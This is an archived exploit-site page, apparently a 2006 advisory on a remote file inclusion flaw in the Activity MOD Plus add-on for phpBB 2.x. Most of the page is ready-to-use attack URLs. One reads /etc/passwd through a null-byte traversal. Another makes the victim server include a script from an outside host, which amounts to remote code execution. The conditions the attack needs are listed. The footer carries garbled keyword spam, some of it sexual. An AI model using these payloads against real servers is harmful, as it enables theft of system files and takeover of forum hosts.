about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability



2006-05-29 Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability
Rated as : High Risk

phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on phpBB 2.x (Activity MOD Plus)
Original advisory can be found at: http://www.nukedx.com/?viewdoc=38

Succesful exploitation needs register_globals on
GET ->
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE ->
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE ->
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on
securitydot.net - 2006-05-29

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:45:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.wishph zgqysw Howtoscany news for c lez kizlar apacche www.girlsc http:/secu phpBB sex gir18 Carmen+ele Sex+Pictur ashly tisd www.19a.co Davila CMS is Fre shtml.exe L2j Phone erot com&am Sexe movi www.dldvb. Www.silkgi VIDEO PRON aishwarya news for c www.youkua nacked gir com_zoom movie sexi PHP Pro Bi news for c search/exp t571t VIDEO PRON IceWarp We Acs news for c need for s search/exp WWW.BEBO.B pics arab t804t cardfusion t571t news for c Photosexy arabic ima news for c www.kar20.